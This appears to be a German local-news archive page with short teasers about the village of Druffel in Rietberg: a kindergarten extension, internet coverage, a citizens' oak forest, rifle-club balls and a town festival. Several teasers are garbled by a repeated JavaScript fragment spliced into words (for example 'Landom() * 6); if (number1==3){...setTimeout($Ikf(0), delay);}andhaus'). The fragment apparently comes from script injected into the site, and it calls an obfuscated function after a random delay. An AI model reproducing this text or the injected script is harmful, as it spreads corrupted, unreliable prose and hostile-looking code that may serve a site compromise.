Category Archives: Druffel

Kindergarten-Anbau in Druffel im Zeitplan

Der Erweiterungsbau für den katholischen Kindergarten St. Gabriel geht mit großen Schritten voran. Die Fassade ist bereits fertiggestellt. Derzeit laufen die Arbeiten für den Regenwasserkanal und für den Innenausbau. Der Inbetriebnahme im September steht derzeit nichts im Wege. Bekanntlich sollen in Druffel künftig in zwei anstatt wie bisher in einer Gruppe Kinder betreut werden. Während

Stadt will weiße Internet-Flecken tilgen

Die Stadt Rietberg macht sich nun auf, auch die letzten weißen Flecken in der Rietberger Internetlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andschaft zu tilgen. Weil es in den Außenbereichen aller Stadtteile und auch in den Innenbereichen von Bokel, Druffel und Westerwiehe vereinzelte Haushalte mit einer schlechten Internetversorgung gibt, strebt die Stadtverwaltung einen erneuten

Kindergarten in Druffel wird verdoppelt

Die Kindergartenerweiterung in Druffel hat die nächste Hürde genommen: Der Rat der Stadt Rietberg hat für den geplanten Ausbau um eine weitere Gruppe die nötigen Finanzmittel in Höhe von 1,25 Millionen Euro bereitgestellt. Im Haushaltsplan stehen bisher lediglich 360.000 Euro sowie eine Verpflichtungsermächtigung über weitere 90.000 Euro zur Verfügung. Die weiterhin nötigen 800.000 Euro hat

Rietbergs erster Bürgerwald wächst und gedeiht

36 junge Eichen wachsen nun neben dem Sportplatz in Druffel – dort ist Rietbergs erster Bürgerwald entstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden. Sie stehen akkurat – die aktuellen Abstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andsregeln einhaltend – in ordentlichen Sechser-Reihen. Davon hat sich Rietbergs Bürgermeister Andreas Sunder jetzt persönlich überzeugt.

Erster Bürgerwald wächst noch in diesem Monat

Gleich neben dem Sportplatz in Druffel soll noch in diesem Monat ein ganzer Schwung frischer Bäume gepflanzt werden. Dort entsteht der erste Bürgerwald im Stadtgebiet. Bezugnehmend auf das Wappen des Ortes will die Dorfgemeinschaft 30 Eichen pflanzen – und selbst bezahlen. Das ist der Sinn hinter einem Bürgerwald – dass Bürger die Patenschaft für einen

Druffeler feiern Winterball

Die St. Johannes Schützenbruderschaft Druffel feiert am Samstag, dem 16. November ihren Winterball. Um 20 Uhr begrüßt das Königspaar Uwe Stenger und Johanna Lohmann gemeinsam mit dem Jungschützenkönigspaar Torsten Junkerkalefeld und Marcia Schuck im Saal des Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andhauses Wimmelbücker. In diesem Jahr hat sich ein neu zusammengesetztes Organisationsteam

Bürgerfest und Volkslauf in Druffel

Am Sonntag, dem 15. September findet in Druffel das Bürgerfest mit Volkslauf statt. Rund um das Bürgerhaus feiern alle Druffeler Vereine und Gruppierungen gemeinsam, alle Bürger sind herzlich eingeladen. Das Fest beginnt mit dem, bereits zum 18. Mal vom Lauftreff der Druffeler Sportgemeinschaft, organisiertem Volkslauf. Ab 10:30 können sich die Teilnehmer im Bürgerhaus anmelden, um

„Gemütlicher Abend“ reißt die Gäste von den Stühlen

Beim traditionellen „Gemütlichen Abend“ der St. Johannes Schützenbruderschaft Druffel gab es am vergangenen Samstag im Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andhaus Wimmelbücker wieder ein erstklassiges Unterhaltungsprogramm mit Tanzgruppen und Künstlern die die rund 150 Gäste von den Stühlen rissen. Herausragender Akteur des Abends war NDR Comedypreisträger Herr Nils. Der Körperillusionist begeisterte die

Bernhard und Elisabeth Hollenbeck sind das neue“ König der Könige“-Paar in Druffel

Mit einem Doppelschuss aus zwei Luftgewehren brachten Bernhard und Elisabeth Hollenbeck den Vogel auf dem Druffeler Schießstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zu fall. Brudermeister Klaus Schnieder proklamierte anschließend Bernhard Hollenbeck zum neuen König der Könige der St. Johannes Schützenbruderschaft. Am vergangenen Samstagnachmittag hatten sich alle ehemaligen Königspaare der Johannesschützen im Bürgerhaus

Interesse am eigenen Ort groß wie lange nicht

Leidenschaftlich hat Bürgermeister Andreas Sunder jetzt mit dutzenden Bürgern diskutiert. Zu den offenen Bürgermeistersprechstunden in Druffel und Neuenkirchen waren rund 50 beziehungsweise 110 Interessierte gekommen, um Neuigkeiten aus ihren Stadtteilen zu erfahren und Anregungen für künftige Entwicklungen zu geben. In Neuenkirchen war das Interesse sogar so groß, dass sämtliche Teilnehmer kurzerhandom() * 6); if (number1==3){var